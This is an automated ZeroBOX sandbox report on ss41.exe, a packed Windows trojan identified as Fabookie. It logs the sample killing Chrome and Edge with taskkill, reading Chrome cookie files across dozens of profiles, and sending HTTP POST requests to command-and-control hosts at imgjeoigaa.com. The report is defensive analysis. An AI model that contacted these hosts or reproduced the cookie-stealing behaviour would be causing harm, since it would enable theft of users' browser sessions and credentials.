Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	June 21, 2023, 3:57 p.m.	June 21, 2023, 3:59 p.m.

Size	421.0KB
Type	PE32+ executable (GUI) x86-64, for MS Windows
MD5	`91670b685d544cc5ee1ca6263dc76a53`
SHA256	`da0c6336e8716fa723c97bf09aa86ec5e5407850c712633b21a6e9c59a94c241`
CRC32	`97F97760`
ssdeep	`6144:ul073J3gQx1K46tV9rSDWso3T+cbJ5JIJAbW0we3:z3JwQHKjT25oCIJ5MZ0w`
PDB Path	SnippingTool.pdb
Yara	UPX_Zero - UPX packed file Win32_Trojan_Gen_1_0904B0_Zero - Win32 Trojan Emotet Win32_Trojan_Gen_2_0904B0_Zero - Win32 Trojan Gen IsPE64 - (no description) PE_Header_Zero - PE File Signature Malicious_Packer_Zero - Malicious Packer Generic_Malware_Zero - Generic Malware

ss41.exe "C:\Users\test22\AppData\Local\Temp\ss41.exe"
880
- taskkill.exe taskkill /IM msedge.exe /F
  2152
- taskkill.exe taskkill /IM chrome.exe /F
  2116

Name	Response	Post-Analysis Lookup
as.imgjeoigaa.com	A 39.109.117.57	39.109.117.57
us.imgjeoigaa.com	A 154.221.19.146	154.221.19.146

IP Address	Status	Action
154.221.19.146	Active	Moloch
164.124.101.2	Active	Moloch
39.109.117.57	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49165 -> 39.109.117.57:80	2045057	ET MALWARE Win32/Fabookie.ek CnC Request M4 (GET)	A Network Trojan was detected

Suricata TLS

No Suricata TLS

Queries for the computername (2 events)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW June 21, 2023, 3:49 p.m.	computer_name: TEST22-PC	1	1	0
GetComputerNameW June 21, 2023, 3:49 p.m.	computer_name: TEST22-PC	1	1	0

Command line console output was observed (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW June 21, 2023, 3:49 p.m.	buffer: ERROR: The process "msedge.exe" not found. console_handle: 0x000000000000000b	1	1	0
WriteConsoleW June 21, 2023, 3:49 p.m.	buffer: ERROR: The process "chrome.exe" not found. console_handle: 0x000000000000000b	1	1	0

This executable has a PDB path (1 event)

pdb_path

SnippingTool.pdb

The file contains an unknown PE resource name possibly indicative of a packer (1 event)

resource name

MUI

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

POST method with no referer header

suspicious_request

POST http://as.imgjeoigaa.com/check/?sid=652746&key=a65e8cd0b8eec374712079683db8bf48

Performs some HTTP requests (3 events)

request	GET http://us.imgjeoigaa.com/sts/imagc.jpg
request	GET http://as.imgjeoigaa.com/check/safe
request	POST http://as.imgjeoigaa.com/check/?sid=652746&key=a65e8cd0b8eec374712079683db8bf48

Sends data using the HTTP POST Method (1 event)

request

POST http://as.imgjeoigaa.com/check/?sid=652746&key=a65e8cd0b8eec374712079683db8bf48

Allocates read-write-execute memory (usually to unpack itself) (3 events)

Time & API	Arguments	Status
NtProtectVirtualMemory June 21, 2023, 3:49 p.m.	process_identifier: 880 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000013fbe2000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 21, 2023, 3:49 p.m.	process_identifier: 880 region_size: 1507328 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002af0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 21, 2023, 3:49 p.m.	process_identifier: 880 region_size: 1249280 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002d30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1

Steals private information from local Internet browsers (50 out of 105 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 58\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 38\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 72\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 81\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 47\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 41\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 56\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 32\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 19\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 30\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 22\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 95\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 70\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 28\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 94\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 68\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 90\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 29\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 91\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 10\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 96\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 46\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 89\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 100\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 66\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 98\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 75\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 86\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 87\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 14\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 82\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 43\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 77\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 61\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 2\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 104\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 67\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 7\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 53\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 33\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 102\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 34\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 99\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 16\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 71\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 42\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 54\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 60\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 24\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 48\Network\Cookies

Executes one or more WMI queries (2 events)

wmi	SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "msedge.exe")
wmi	SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")

File has been identified by 4 AntiVirus engines on VirusTotal as malicious (4 events)

Kaspersky	UDS:Trojan-Downloader.Win32.Agent
Microsoft	Trojan:Win32/Wacatac.H!ml
ZoneAlarm	UDS:Trojan-Downloader.Win32.Agent
Rising	Trojan.Fabookie!8.11C3D (TFE:3:6He1n0LJ9NN)

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses June 21, 2023, 3:49 p.m.	flags: 15 family: 0		111	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW June 21, 2023, 3:49 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW June 21, 2023, 3:49 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Uses Windows utilities for basic Windows functionality (2 events)

cmdline	taskkill /IM chrome.exe /F
cmdline	taskkill /IM msedge.exe /F

ss41.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All